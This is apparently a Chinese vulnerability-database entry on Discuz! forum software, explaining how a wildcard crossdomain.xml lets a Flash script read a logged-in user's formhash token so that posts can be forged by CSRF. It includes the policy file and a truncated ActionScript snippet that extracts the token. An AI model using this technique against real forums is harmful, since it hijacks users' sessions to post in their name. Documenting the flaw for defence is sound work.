Discuz!配置不当可导致CSRF发帖

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: Discuz!配置不当可导致CSRF发帖 ### 详细说明: 这个漏洞中评论说的 [WooYun: Discuz!全版本鸡肋CSRF漏洞一枚](http://www.wooyun.org/bugs/wooyun-2013-038411) ,由于crossdomain.xml配置不当,可能会导致一些问题。评论时只是有个基本的印象,没有实测,既然xsser说有对这个的防御,那来看看是怎么防的. crossdomain.xml的默认设置: ``` <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> ``` 对dz的代码结构不熟,按黑盒来测。 首先是读取那个formhash,看来有了crossdomain.xml的帮助,很容易的读到了当前用户的formhash。 [<img src="https://images.seebug.org/upload/201309/28135012263cb454c32c191321f8186e093348f4.png" alt="8.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201309/28135012263cb454c32c191321f8186e093348f4.png) ``` function gethash() { function getformhash(txt) { txt = txt.split('action=logout&amp;formhash=')[1].split('"')[0]; return txt; } var result_lv:LoadVars = new LoadVars(); result_lv.onData = function(txt) { if (txt) { txt = getformhash(txt); } else { txt = "Error connecting to server."; } trace(txt); }; var send_lv:LoadVars = new...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息